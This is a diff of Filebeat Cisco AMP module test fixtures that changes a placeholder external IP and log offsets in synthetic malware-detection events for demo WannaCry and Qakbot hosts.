@@ -2439,7 +2439,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 78202, + "log.offset": 78397, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2448,7 +2448,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2460,7 +2460,7 @@ "@timestamp": "2021-01-14T15:50:23.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2498,7 +2498,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 79439, + "log.offset": 79639, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2507,7 +2507,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2519,7 +2519,7 @@ "@timestamp": "2021-01-14T15:50:23.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2557,7 +2557,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 80676, + "log.offset": 80881, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2566,7 +2566,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -2578,7 +2578,7 @@ "@timestamp": "2021-01-14T15:24:25.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2612,7 +2612,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 81932, + "log.offset": 82142, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -2621,7 +2621,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2633,7 +2633,7 @@ "@timestamp": "2021-01-14T15:24:25.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2673,7 +2673,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 83114, + "log.offset": 83329, "related.hash": [ "32c9e6737dbdcbfb7563a3f27e2b1571", "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", @@ -2684,7 +2684,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2700,7 +2700,7 @@ "@timestamp": "2021-01-14T15:24:25.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2736,7 +2736,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 84487, + "log.offset": 84707, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], 
@@ -2745,7 +2745,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2761,7 +2761,7 @@ "@timestamp": "2021-01-14T15:24:25.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2801,7 +2801,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 85686, + "log.offset": 85911, "related.hash": [ "32c9e6737dbdcbfb7563a3f27e2b1571", "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", @@ -2812,7 +2812,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2828,7 +2828,7 @@ "@timestamp": "2021-01-14T15:24:25.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2860,7 +2860,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 87059, + "log.offset": 87289, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -2869,7 +2869,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2881,7 +2881,7 @@ "@timestamp": "2021-01-14T15:18:49.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -2915,7 +2915,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 88168, + "log.offset": 88403, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -2924,7 +2924,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2936,7 +2936,7 @@ "@timestamp": "2021-01-14T15:18:49.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2975,7 +2975,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 89361, + "log.offset": 89601, "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", @@ -2989,7 +2989,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -3005,7 +3005,7 @@ "@timestamp": "2021-01-14T15:18:48.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3037,7 +3037,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 90868, + "log.offset": 91113, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -3046,7 +3046,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -3058,7 +3058,7 @@ "@timestamp": "2021-01-14T14:41:06.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3092,7 +3092,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 91988, + "log.offset": 92238, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -3101,7 +3101,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3113,7 +3113,7 @@ "@timestamp": "2021-01-14T14:41:06.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3147,7 +3147,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 93180, + "log.offset": 93435, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -3156,7 +3156,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3168,7 +3168,7 @@ "@timestamp": "2021-01-14T14:41:06.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3206,7 +3206,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 94365, + "log.offset": 94625, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
@@ -3215,7 +3215,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -3231,7 +3231,7 @@ "@timestamp": "2021-01-14T14:41:06.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3269,7 +3269,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 95638, + "log.offset": 95903, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -3278,7 +3278,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -3294,7 +3294,7 @@ "@timestamp": "2021-01-14T14:41:06.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3332,7 +3332,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 96911, + "log.offset": 97181, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -3341,7 +3341,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -3357,7 +3357,7 @@ "@timestamp": "2021-01-14T14:41:06.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -3395,7 +3395,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 98184, + "log.offset": 98459, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -3404,7 +3404,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -3420,7 +3420,7 @@ "@timestamp": "2021-01-14T14:41:06.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3458,7 +3458,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 99457, + "log.offset": 99737, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -3467,7 +3467,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -3483,7 +3483,7 @@ "@timestamp": "2021-01-14T14:41:06.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3521,7 +3521,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 100730, + "log.offset": 101015, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -3530,7 +3530,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -3546,7 +3546,7 @@ "@timestamp": "2021-01-14T14:41:06.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3584,7 +3584,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 102003, + "log.offset": 102293, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -3593,7 +3593,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -3609,7 +3609,7 @@ "@timestamp": "2021-01-14T14:41:06.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3647,7 +3647,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 103275, + "log.offset": 103570, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -3656,7 +3656,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -3672,7 +3672,7 @@ "@timestamp": "2021-01-14T14:41:06.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3710,7 +3710,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 104547, + "log.offset": 104847, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
@@ -3719,7 +3719,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log index 6ccff00d38b1..c3b68a16f627 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log 
@@ -1,53 +1,53 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 